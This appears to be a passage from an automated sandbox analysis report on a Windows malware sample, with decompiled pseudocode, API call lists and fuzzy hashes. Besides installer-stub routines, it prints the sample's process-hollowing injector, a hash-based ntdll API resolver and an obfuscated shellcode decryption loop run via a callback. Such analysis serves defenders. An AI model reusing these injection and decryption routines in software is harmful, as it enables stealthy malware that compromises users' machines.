              					__eflags = _t37;
              					if(_t37 == 0) {
              						L31:
              						__eflags = _v8;
              						if(_v8 == 0) {
              							L39:
              							return _t37;
              						}
              						__eflags = _v12;
              						if(_v12 != 0) {
              							_t37 = E00405EC2(_t72);
              							__eflags = _t37;
              							if(_t37 == 0) {
              								goto L39;
              							}
              							E004056BA(_t72);
              							E0040587F(_t72);
              							_t37 = RemoveDirectoryA(_t72);
              							__eflags = _t37;
              							if(_t37 != 0) {
              								return E00404EB3(0xffffffe5, _t72);
              							}
              							__eflags = _a8 & 0x00000004;
              							if((_a8 & 0x00000004) == 0) {
              								goto L33;
              							}
              							E00404EB3(0xfffffff1, _t72);
              							return E00405915(__eflags, _t72, 0);
              						}
              						L33:
              						 *0x42eca8 =  *0x42eca8 + 1;
              						return _t37;
              					}
              					__eflags = _a8 & 0x00000002;
              					if((_a8 & 0x00000002) == 0) {
              						goto L31;
              					}
              					goto L5;
              				}
              			}

              APIs
              • DeleteFileA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040550A
              • lstrcatA.KERNEL32(0042B0A8,\*.*,0042B0A8,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405554
              • lstrcatA.KERNEL32(?,00409010,?,0042B0A8,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405575
              • lstrlenA.KERNEL32(?,?,00409010,?,0042B0A8,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040557B
              • FindFirstFileA.KERNEL32(0042B0A8,?,?,?,00409010,?,0042B0A8,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040558C
              • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 0040563E
              • FindClose.KERNEL32(?), ref: 0040564F
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
              • String ID: "C:\Users\Public\vbc.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
              • API String ID: 2035342205-3287302484
              • Opcode ID: 218d19487e3f4a391fa6828d614a1926fec5280024387b6012ef8031cc60189a
              • Instruction ID: 3bcb6ec240d98e814f0ac214cdfa27fda4082eb57bc811e5fc2e7534dee8d376
              • Opcode Fuzzy Hash: 218d19487e3f4a391fa6828d614a1926fec5280024387b6012ef8031cc60189a
              • Instruction Fuzzy Hash: E0512430404A447ADF216B328C49BBF3AB8DF52319F54443BF809751D2CB3C59829EAD
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 32%
              			E7306BF13(intOrPtr _a4) {
              				intOrPtr _v8;
              				signed int _v12;
              				intOrPtr* _v16;
              				char _v20;
              				char* _v24;
              				intOrPtr _v28;
              				char* _v32;
              				intOrPtr _v36;
              				char* _v40;
              				long _v44;
              				intOrPtr _v48;
              				void* _v52;
              				intOrPtr _v56;
              				struct _PROCESS_INFORMATION _v72;
              				short _v74;
              				short _v76;
              				short _v78;
              				short _v80;
              				short _v82;
              				short _v84;
              				short _v86;
              				short _v88;
              				short _v90;
              				char _v92;
              				intOrPtr _v96;
              				intOrPtr _v100;
              				intOrPtr _v104;
              				intOrPtr _v108;
              				intOrPtr _v112;
              				intOrPtr _v116;
              				intOrPtr _v120;
              				intOrPtr _v124;
              				intOrPtr _v128;
              				intOrPtr _v132;
              				long _v136;
              				intOrPtr _v156;
              				void _v160;
              				struct _STARTUPINFOW _v228;
              				short _v1268;
              				short _t136;
              				short _t137;
              				short _t138;
              				short _t139;
              				short _t140;
              				short _t141;
              				short _t142;
              				short _t143;
              				short _t144;
              				signed int _t163;
              				void* _t179;
              				intOrPtr _t181;
              				void* _t188;
              				intOrPtr _t189;
              				signed int _t200;
              
              				_t136 = 0x6e;
              				_v92 = _t136;
              				_t137 = 0x74;
              				_v90 = _t137;
              				_t138 = 0x64;
              				_v88 = _t138;
              				_t139 = 0x6c;
              				_v86 = _t139;
              				_t140 = 0x6c;
              				_v84 = _t140;
              				_t141 = 0x2e;
              				_v82 = _t141;
              				_t142 = 0x64;
              				_v80 = _t142;
              				_t143 = 0x6c;
              				_v78 = _t143;
              				_t144 = 0x6c;
              				_v76 = _t144;
              				_v74 = 0;
              				_v52 = _v52 & 0x00000000;
              				_v8 = E7306B737();
              				_v100 = E7306B7E6(_v8, 0xff7f721a);
              				_v108 = E7306B7E6(_v8, 0x7fe2736c);
              				_v104 = E7306B7E6(_v8, 0x7fb6c905);
              				_v124 = E7306B7E6(_v8, 0x3f798a2d);
              				_v132 = E7306B7E6(_v8, 0x7fe7f9c0);
              				_v96 = E7306B7E6(_v8, 0x7fd6a366);
              				_v112 = E7306B7E6(_v96( &_v92), 0x7f739ec6);
              				_v128 = E7306B7E6(_v8, 0x7f98f12e);
              				_t255 = 0x7fb1f910;
              				_v116 = E7306B7E6(_v8, 0x7fb1f910);
              				_push(0x103);
              				_push( &_v1268);
              				_push(0);
              				if(_v100() != 0) {
              					_v56 = _a4;
              					_v16 = _a4 +  *((intOrPtr*)(_v56 + 0x3c));
              					if( *_v16 == 0x4550) {
              						_t163 = 8;
              						_t241 = _v16;
              						if( *((intOrPtr*)(_v16 + 0x7c + _t163 * 5)) != 0) {
              							_v28 = 0x10;
              							_v24 =  &_v72;
              							while(_v28 != 0) {
              								 *_v24 = 0;
              								_v24 = _v24 + 1;
              								_v28 = _v28 - 1;
              							}
              							_v36 = 0x44;
              							_v32 =  &_v228;
              							while(_v36 != 0) {
              								 *_v32 = 0;
              								_v32 = _v32 + 1;
              								_v36 = _v36 - 1;
              							}
              							_v44 = 0x18;
              							_v40 =  &_v160;
              							while(_v44 != 0) {
              								 *_v40 = 0;
              								_v40 = _v40 + 1;
              								_v44 = _v44 - 1;
              							}
              							if(CreateProcessW( &_v1268, _v104(), 0, 0, 0, 4, 0, 0,  &_v228,  &_v72) != 0) {
              								NtQueryInformationProcess(_v72.hProcess, 0,  &_v160, 0x18,  &_v136);
              								_v20 = VirtualAllocEx(_v72.hProcess, 0,  *(_v16 + 0x50), 0x3000, 0x40);
              								if(_v20 != 0) {
              									_push(0);
              									_push( *((intOrPtr*)(_v16 + 0x54)));
              									_push(_a4);
              									_push(_v20);
              									_push(_v72.hProcess);
              									_t179 = E7306B2D7(_t241, _t255); // executed
              									if(_t179 != 0) {
              										_t181 =  *((intOrPtr*)(_v56 + 0x3c));
              										_t242 = _a4;
              										_t97 = _t181 + 0xf8; // 0xf8
              										_v48 = _a4 + _t97;
              										_v12 = _v12 & 0x00000000;
              										while(_v12 < ( *(_v16 + 6) & 0x0000ffff)) {
              											_push(0);
              											_push( *((intOrPtr*)(_v48 + 0x10 + _v12 * 0x28)));
              											_push(_a4 +  *((intOrPtr*)(_v48 + 0x14 + _v12 * 0x28)));
              											_t200 = _v12 * 0x28;
              											_t242 = _v48;
              											_t255 = _v20 +  *((intOrPtr*)(_t242 + _t200 + 0xc));
              											_push(_v20 +  *((intOrPtr*)(_t242 + _t200 + 0xc)));
              											_push(_v72.hProcess);
              											E7306B2D7(_t242, _v20 +  *((intOrPtr*)(_t242 + _t200 + 0xc))); // executed
              											_v12 = _v12 + 1;
              										}
              										_v120 = _v156 + 8;
              										_push(0);
              										_push(4);
              										_push( &_v20);
              										_push(_v120);
              										_push(_v72.hProcess);
              										_t188 = E7306B2D7(_t242, _t255); // executed
              										if(_t188 != 0) {
              											_t189 = _v16;
              											_t244 = _v20 +  *((intOrPtr*)(_t189 + 0x28));
              											_v52 = CreateRemoteThread(_v72, 0, 0, _v20 +  *((intOrPtr*)(_t189 + 0x28)), 0, 4, 0);
              											if(_v52 != 0) {
              												E7306B226(_t244, _t255, _v52); // executed
              												SuspendThread(_v72.hThread);
              												return 0;
              											}
              											return 1;
              										}
              										return 1;
              									}
              									return 1;
              								}
              								return 1;
              							}
              							return 1;
              						}
              						return E7306C23B(_a4);
              					}
              					return 1;
              				}
              				return 1;
              			}

              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.470398757.000000007306B000.00000040.00020000.sdmp, Offset: 73060000, based on PE: true
              • Associated: 00000004.00000002.470375139.0000000073060000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.470380318.0000000073061000.00000020.00020000.sdmp
              • Associated: 00000004.00000002.470388169.0000000073069000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.470394866.000000007306A000.00000080.00020000.sdmp
              • Associated: 00000004.00000002.470403984.000000007306D000.00000080.00020000.sdmp
              • Associated: 00000004.00000002.470409100.000000007306E000.00000002.00020000.sdmp
              Similarity
              • API ID:
              • String ID: D
              • API String ID: 0-2746444292
              • Opcode ID: e1f5ae983d32ee915ab5497fe06861bbfc5f0196f260ecb4dce48228ef041784
              • Instruction ID: d5d5f5d46deea738518ee5868bb4313de4a04461601f9d14d0fb26d9bb152596
              • Opcode Fuzzy Hash: e1f5ae983d32ee915ab5497fe06861bbfc5f0196f260ecb4dce48228ef041784
              • Instruction Fuzzy Hash: 80B11870E40209EFEB51CFE4C981BADBBF5BF48B04F204469E656EB294E7749A41CB50
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 82%
              			E7306B472(void* __eflags, intOrPtr _a4) {
              				void* _v8;
              				signed int _v12;
              				long _v16;
              				void* _v20;
              				intOrPtr _v24;
              				intOrPtr _v28;
              				signed int _v32;
              				intOrPtr _v36;
              				long _v40;
              				short _v42;
              				short _v44;
              				short _v46;
              				short _v48;
              				short _v50;
              				short _v52;
              				short _v54;
              				short _v56;
              				short _v58;
              				char _v60;
              				short _t60;
              				short _t61;
              				short _t62;
              				void* _t78;
              				void* _t79;
              				void _t81;
              				long _t86;
              				void* _t91;
              				void* _t95;
              				void* _t100;
              				void* _t102;
              				short _t103;
              				short _t120;
              				signed int _t133;
              				void* _t135;
              				void* _t136;
              				void* _t138;
              				void* _t139;
              				void* _t141;
              				void* _t142;
              
              				_t142 = __eflags;
              				_t60 = 0x6e;
              				_v60 = _t60;
              				_t100 = 0;
              				_t61 = 0x74;
              				_t103 = 0x64;
              				_t120 = 0x6c;
              				_v58 = _t61;
              				_t62 = 0x2e;
              				_v50 = _t62;
              				_v56 = _t103;
              				_v54 = _t120;
              				_v52 = _t120;
              				_v48 = _t103;
              				_v46 = _t120;
              				_v44 = _t120;
              				_v42 = 0;
              				_t137 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
              				E7306B7E6( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18)), 0x7fe63623);
              				_v16 = E7306B7E6( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18)), 0x7fbd727f);
              				_v12 = E7306B7E6(_t137, 0x7fb47add);
              				_v32 = E7306B7E6(_t137, 0x7fe7f840);
              				_v24 = E7306B7E6(_t137, 0x7fe1f1fb);
              				_v28 = E7306B7E6(_t137, 0x7f951704);
              				_v36 = E7306B7E6(_t137, 0x7f91a078);
              				_t78 = CreateFileW(E7306B7B4( &_v60, _t142), 0x80000000, 7, 0, 3, 0x80, 0); // executed
              				_t138 = _t78;
              				_v20 = _t138;
              				if(_t138 == 0xffffffff) {
              					L13:
              					_t139 = _t100;
              					L14:
              					_t79 = _v20;
              					__eflags = _t79;
              					if(_t79 != 0) {
              						_v24(_t79);
              					}
              					_v36(0);
              					L22:
              					while( *_t100 != 0xb8) {
              						_t81 =  *_t100;
              						__eflags = _t81 - 0xe9;
              						if(_t81 != 0xe9) {
              							__eflags = _t81 - 0xea;
              							if(_t81 != 0xea) {
              								_t100 = _t100 + 1;
              								__eflags = _t100;
              							} else {
              								_t100 =  *(_t100 + 1);
              							}
              						} else {
              							_t100 = _t100 + 5 +  *(_t100 + 1);
              						}
              					}
              					_t135 =  *(_t100 + 1);
              					if(_t139 != 0) {
              						VirtualFree(_t139, 0, 0x8000);
              					}
              					return _t135;
              				}
              				_t86 = _v16(_t138, 0);
              				_v16 = _t86;
              				if(_t86 == 0xffffffff) {
              					goto L13;
              				}
              				_t136 = VirtualAlloc(0, _t86, 0x3000, 4);
              				if(_t136 == 0 || ReadFile(_t138, _t136, _v16,  &_v40, 0) == 0) {
              					goto L13;
              				} else {
              					_t141 =  *((intOrPtr*)(_t136 + 0x3c)) + _t136;
              					_v32 =  *(_t141 + 0x14) & 0x0000ffff;
              					_t91 = VirtualAlloc(0,  *(_t141 + 0x50), 0x3000, 4);
              					_v8 = _t91;
              					if(_t91 == 0) {
              						_t139 = _t91;
              						goto L14;
              					}
              					E7306B74B(_t91, _t136,  *((intOrPtr*)(_t141 + 0x54)));
              					_v12 = _v12 & 0;
              					if(0 >=  *(_t141 + 6)) {
              						L8:
              						_t139 = _v8;
              						_t100 = E7306B7E6(_t139, _a4);
              						if(_t100 == 0) {
              							goto L14;
              						}
              						_t95 = _v20;
              						if(_t95 != 0) {
              							CloseHandle(_t95);
              						}
              						VirtualFree(_t136, 0, 0x8000);
              						goto L22;
              					} else {
              						_t102 = _v8;
              						_t116 = _v32 + 0x2c + _t141;
              						_v16 = _v32 + 0x2c + _t141;
              						do {
              							E7306B74B( *((intOrPtr*)(_t116 - 8)) + _t102,  *_t116 + _t136,  *((intOrPtr*)(_t116 - 4)));
              							_t133 = _v12 + 1;
              							_t116 = _v16 + 0x28;
              							_v12 = _t133;
              							_v16 = _v16 + 0x28;
              						} while (_t133 < ( *(_t141 + 6) & 0x0000ffff));
              						goto L8;
              					}
              				}
              			}

              APIs
              • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 7306B54C
              • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,?,?,7306B1FA,7FC6FA16,7306B3B9), ref: 7306B576
              • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,7306B1FA,7FC6FA16), ref: 7306B58D
              • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,7306B1FA,7FC6FA16,7306B3B9), ref: 7306B5AF
              • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,7306B1FA,7FC6FA16,7306B3B9,00000000,00000000), ref: 7306B622
              • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,7306B1FA,7FC6FA16,7306B3B9), ref: 7306B62D
              • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,7306B1FA,7FC6FA16,7306B3B9,00000000), ref: 7306B678
              Memory Dump Source
              • Source File: 00000004.00000002.470398757.000000007306B000.00000040.00020000.sdmp, Offset: 73060000, based on PE: true
              • Associated: 00000004.00000002.470375139.0000000073060000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.470380318.0000000073061000.00000020.00020000.sdmp
              • Associated: 00000004.00000002.470388169.0000000073069000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.470394866.000000007306A000.00000080.00020000.sdmp
              • Associated: 00000004.00000002.470403984.000000007306D000.00000080.00020000.sdmp
              • Associated: 00000004.00000002.470409100.000000007306E000.00000002.00020000.sdmp
              Similarity
              • API ID: Virtual$AllocFileFree$CloseCreateHandleRead
              • String ID:
              • API String ID: 721982790-0
              • Opcode ID: af7b555d49f7dab9e8ba194529cc05e2405c0ec283943ac24b372fda9630fd69
              • Instruction ID: 7f6fe46324a56d2e56e1acd1e38410d6b4917a38910e9a7c5f698399a49b801b
              • Opcode Fuzzy Hash: af7b555d49f7dab9e8ba194529cc05e2405c0ec283943ac24b372fda9630fd69
              • Instruction Fuzzy Hash: 356170B5E00704EBDF11CFA5C890BAEB7B6AF48A10F148059F506EB394EB749D02CB54
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E73067500(void* __ecx) {
              				signed int _v5;
              				signed int _v12;
              				struct HINSTANCE__* _v16;
              				void* _t111;
              				int _t114;
              				void* _t153;
              
              				_t153 = __ecx;
              				_v16 = 0;
              				_t111 = VirtualAlloc(0, 0xbebc200, 0x3000, 4); // executed
              				_v16 = _t111;
              				if(_v16 != 0) {
              					E730677D0(_t153, _v16, 0xbebc200);
              					_v12 = 0;
              					_v12 = 0;
              					while(_v12 < 0x1495) {
              						_t11 = E7306B070 + _v12; // 0x25000000
              						_v5 =  *_t11;
              						_v5 =  ~(_v5 & 0x000000ff);
              						_v5 = _v5 & 0x000000ff ^ _v12;
              						_v5 = (_v5 & 0x000000ff) >> 0x00000001 | (_v5 & 0x000000ff) << 0x00000007;
              						_v5 = (_v5 & 0x000000ff) + 0xdc;
              						_v5 = _v5 & 0x000000ff ^ 0x00000074;
              						_v5 = (_v5 & 0x000000ff) - _v12;
              						_v5 = _v5 & 0x000000ff ^ 0x00000043;
              						_v5 = (_v5 & 0x000000ff) >> 0x00000001 | (_v5 & 0x000000ff) << 0x00000007;
              						_v5 = (_v5 & 0x000000ff) + 0xbc;
              						_v5 =  !(_v5 & 0x000000ff);
              						_v5 =  ~(_v5 & 0x000000ff);
              						_v5 = (_v5 & 0x000000ff) - 0xd9;
              						_v5 = _v5 & 0x000000ff ^ 0x0000008d;
              						_v5 = (_v5 & 0x000000ff) >> 0x00000002 | (_v5 & 0x000000ff) << 0x00000006;
              						_v5 = _v5 & 0x000000ff ^ _v12;
              						_v5 =  !(_v5 & 0x000000ff);
              						_v5 = _v5 & 0x000000ff ^ 0x00000021;
              						_v5 = (_v5 & 0x000000ff) >> 0x00000007 | (_v5 & 0x000000ff) << 0x00000001;
              						_v5 = (_v5 & 0x000000ff) + _v12;
              						_v5 = _v5 & 0x000000ff ^ 0x000000f3;
              						_v5 = (_v5 & 0x000000ff) - 0x14;
              						_v5 = (_v5 & 0x000000ff) >> 0x00000005 | (_v5 & 0x000000ff) << 0x00000003;
              						_v5 = (_v5 & 0x000000ff) + 0x96;
              						_v5 = _v5 & 0x000000ff ^ 0x000000e9;
              						_v5 = (_v5 & 0x000000ff) + _v12;
              						_v5 = _v5 & 0x000000ff ^ 0x0000002b;
              						_v5 = (_v5 & 0x000000ff) + 0xf7;
              						_v5 = (_v5 & 0x000000ff) >> 0x00000007 | (_v5 & 0x000000ff) << 0x00000001;
              						_v5 =  ~(_v5 & 0x000000ff);
              						_v5 = _v5 & 0x000000ff ^ 0x0000001b;
              						_v5 = (_v5 & 0x000000ff) - 0x82;
              						_v5 = _v5 & 0x000000ff ^ 0x000000e1;
              						_v5 =  ~(_v5 & 0x000000ff);
              						_v5 = (_v5 & 0x000000ff) >> 0x00000001 | (_v5 & 0x000000ff) << 0x00000007;
              						_v5 = _v5 & 0x000000ff ^ 0x000000a0;
              						_v5 = (_v5 & 0x000000ff) + 0x26;
              						_v5 = (_v5 & 0x000000ff) >> 0x00000002 | (_v5 & 0x000000ff) << 0x00000006;
              						_v5 = _v5 & 0x000000ff ^ _v12;
              						_v5 = (_v5 & 0x000000ff) >> 0x00000007 | (_v5 & 0x000000ff) << 0x00000001;
              						_v5 =  ~(_v5 & 0x000000ff);
              						 *((char*)(E7306B070 + _v12)) = _v5;
              						_v12 = _v12 + 1;
              					}
              					_t114 = EnumResourceTypesA(0, E7306B070, 0); // executed
              					return _t114;
              				}
              				return _t111;
              			}

              APIs
              • VirtualAlloc.KERNELBASE(00000000,0BEBC200,00003000,00000004), ref: 7306751B
              • EnumResourceTypesA.KERNEL32(00000000,7306B070,00000000), ref: 7306777D
              Memory Dump Source
              • Source File: 00000004.00000002.470380318.0000000073061000.00000020.00020000.sdmp, Offset: 73060000, based on PE: true
              • Associated: 00000004.00000002.470375139.0000000073060000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.470388169.0000000073069000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.470394866.000000007306A000.00000080.00020000.sdmp
              • Associated: 00000004.00000002.470398757.000000007306B000.00000040.00020000.sdmp
              • Associated: 00000004.00000002.470403984.000000007306D000.00000080.00020000.sdmp
              • Associated: 00000004.00000002.470409100.000000007306E000.00000002.00020000.sdmp
              Similarity
              • API ID: AllocEnumResourceTypesVirtual
              • String ID:
              • API String ID: 1791965044-0
              • Opcode ID: 52580722b79e844493d141f484e7b6c488752fe60a76ddc34854235fcc8fc66f
              • Instruction ID: 03c94455431d803c14ceb2a4c77731fa1ab3addc41c78b8cebac9e740afd6a86
              • Opcode Fuzzy Hash: 52580722b79e844493d141f484e7b6c488752fe60a76ddc34854235fcc8fc66f
              • Instruction Fuzzy Hash: 7D81A454C4D2E8A9DB16C7FA54643ECBFB15F67102F0881DAE0E1A6387C47A538EDB21
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00405EC2(CHAR* _a4) {
              				void* _t2;
              
              				_t2 = FindFirstFileA(_a4, 0x42c0f0); // executed
              				if(_t2 == 0xffffffff) {
              					return 0;
              				}
              				FindClose(_t2);
              				return 0x42c0f0;
              			}

              APIs
              • FindFirstFileA.KERNELBASE(?,0042C0F0,0042B4A8,004057DE,0042B4A8,0042B4A8,00000000,0042B4A8,0042B4A8,?,?,?,00405500,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405ECD
              • FindClose.KERNEL32(00000000), ref: 00405ED9
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID: Find$CloseFileFirst
              • String ID:
              • API String ID: 2295610775-0
              • Opcode ID: 3bbfcd8d52008985354620b371f401d232f9e70872954503675e198784383319
              • Instruction ID: 29e96ad6865097314c3b976147751eb8d0045a3fb470af3f15328f49aab52e00
              • Opcode Fuzzy Hash: 3bbfcd8d52008985354620b371f401d232f9e70872954503675e198784383319
              • Instruction Fuzzy Hash: 11D0C9319185209BC2105768AD0885B6A59DB593357108A72B465F62E0CA7499528AEA
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 96%
              			E0040361A(void* __eflags) {
              				intOrPtr _v4;
              				intOrPtr _v8;
              				int _v12;
              				int _v16;
              				char _v20;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				intOrPtr* _t20;
              				signed int _t24;
              				void* _t28;
              				void* _t30;
              				int _t31;
              				void* _t34;
              				int _t37;
              				int _t38;
              				intOrPtr _t39;
              				int _t42;
              				intOrPtr _t60;
              				char _t62;
              				CHAR* _t64;
              				signed char _t68;
              				struct HINSTANCE__* _t76;
              				CHAR* _t79;
              				intOrPtr _t81;
              				CHAR* _t85;
              
              				_t81 =  *0x42ec30; // 0x504d60
              				_t20 = E00405F57(3);
              				_t88 = _t20;
              				if(_t20 == 0) {
              					_t79 = 0x42a0a0;
              					"1033" = 0x7830;
              					E00405AAE(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x42a0a0, 0);
              					__eflags =  *0x42a0a0;
              					if(__eflags == 0) {
              						E00405AAE(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407342, 0x42a0a0, 0);
              					}
              					lstrcatA("1033", _t79);
              				} else {
              					E00405B25("1033",  *_t20() & 0x0000ffff);
              				}
              				E004038E3(_t76, _t88);
              				_t24 =  *0x42ec38; // 0x80
              				_t84 = "C:\\Users\\Albus\\AppData\\Local\\Temp";
              				 *0x42eca0 = _t24 & 0x00000020;
              				 *0x42ecbc = 0x10000;
              				if(E0040579B(_t88, "C:\\Users\\Albus\\AppData\\Local\\Temp") != 0) {
              					L16:
              					if(E0040579B(_t96, _t84) == 0) {
              						E00405BE9(0, _t79, _t81, _t84,  *((intOrPtr*)(_t81 + 0x118)));
              					}
              					_t28 = LoadImageA( *0x42ec20, 0x67, 1, 0, 0, 0x8040);
              					 *0x42e408 = _t28;
              					if( *((intOrPtr*)(_t81 + 0x50)) == 0xffffffff) {
              						L21:
              						if(E0040140B(0) == 0) {
              							_t30 = E004038E3(_t76, __eflags);
              							__eflags =  *0x42ecc0; // 0x0
              							if(__eflags != 0) {
              								_t31 = E00404F85(_t30, 0);
              								__eflags = _t31;
              								if(_t31 == 0) {
              									E0040140B(1);
              									goto L33;
              								}
              								__eflags =  *0x42e3ec; // 0x0
              								if(__eflags == 0) {
              									E0040140B(2);
              								}
              								goto L22;
              							}
              							ShowWindow( *0x42a078, 5); // executed
              							_t37 = E00405EE9("RichEd20"); // executed
              							__eflags = _t37;
              							if(_t37 == 0) {
              								E00405EE9("RichEd32");
              							}
              							_t85 = "RichEdit20A";
              							_t38 = GetClassInfoA(0, _t85, 0x42e3c0);
              							__eflags = _t38;
              							if(_t38 == 0) {
              								GetClassInfoA(0, "RichEdit", 0x42e3c0);
              								 *0x42e3e4 = _t85;
              								RegisterClassA(0x42e3c0);
              							}
              							_t39 =  *0x42e400; // 0x0
              							_t42 = DialogBoxParamA( *0x42ec20, _t39 + 0x00000069 & 0x0000ffff, 0, E004039B0, 0); // executed
              							E0040356A(E0040140B(5), 1);
              							return _t42;
              						}
              						L22:
              						_t34 = 2;
              						return _t34;
              					} else {
              						_t76 =  *0x42ec20; // 0x400000
              						 *0x42e3d4 = _t28;
              						_v20 = 0x624e5f;
              						 *0x42e3c4 = E00401000;
              						 *0x42e3d0 = _t76;
              						 *0x42e3e4 =  &_v20;
              						if(RegisterClassA(0x42e3c0) == 0) {
              							L33:
              							__eflags = 0;
              							return 0;
              						}
              						_t12 =  &_v16; // 0x624e5f
              						SystemParametersInfoA(0x30, 0, _t12, 0);
              						 *0x42a078 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42ec20, 0);
              						goto L21;
              					}
              				} else {
              					_t76 =  *(_t81 + 0x48);
              					if(_t76 == 0) {
              						goto L16;
              					}
              					_t60 =  *0x42ec58; // 0x50a4d4
              					_t79 = 0x42dbc0;
              					E00405AAE( *((intOrPtr*)(_t81 + 0x44)), _t76,  *((intOrPtr*)(_t81 + 0x4c)) + _t60, 0x42dbc0, 0);
              					_t62 =  *0x42dbc0; // 0x54
              					if(_t62 == 0) {
              						goto L16;
              					}
              					if(_t62 == 0x22) {
              						_t79 = 0x42dbc1;
              						 *((char*)(E004056E5(0x42dbc1, 0x22))) = 0;
              					}
              					_t64 = lstrlenA(_t79) + _t79 - 4;
              					if(_t64 <= _t79 || lstrcmpiA(_t64, ?str?) != 0) {
              						L15:
              						E00405BC7(_t84, E004056BA(_t79));
              						goto L16;
              					} else {
              						_t68 = GetFileAttributesA(_t79);
              						if(_t68 == 0xffffffff) {
              							L14:
              							E00405701(_t79);
              							goto L15;
              						}
              						_t96 = _t68 & 0x00000010;
              						if((_t68 & 0x00000010) != 0) {
              							goto L15;
              						}
              						goto L14;
              					}
              				}
              			}


              APIs
                • Part of subcall function 00405F57: GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
                • Part of subcall function 00405F57: GetProcAddress.KERNEL32(00000000,?,?,?,00403194,0000000D), ref: 00405F84
              • lstrcatA.KERNEL32(1033,0042A0A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A0A0,00000000,00000003,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\Public\vbc.exe" ,00000000), ref: 0040368B
              • lstrlenA.KERNEL32(TclpOwkq,?,?,?,TclpOwkq,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A0A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A0A0,00000000,00000003,C:\Users\user\AppData\Local\Temp\), ref: 00403700
              • lstrcmpiA.KERNEL32(?,.exe,TclpOwkq,?,?,?,TclpOwkq,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A0A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A0A0,00000000), ref: 00403713
              • GetFileAttributesA.KERNEL32(TclpOwkq), ref: 0040371E
              • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp), ref: 00403767
                • Part of subcall function 00405B25: wsprintfA.USER32 ref: 00405B32
              • RegisterClassA.USER32 ref: 004037AE
              • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 004037C6
              • CreateWindowExA.USER32 ref: 004037FF
              • ShowWindow.USER32(00000005,00000000), ref: 00403835
              • GetClassInfoA.USER32(00000000,RichEdit20A,0042E3C0), ref: 00403861
              • GetClassInfoA.USER32(00000000,RichEdit,0042E3C0), ref: 0040386E
              • RegisterClassA.USER32(0042E3C0), ref: 00403877
              • DialogBoxParamA.USER32 ref: 00403896
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
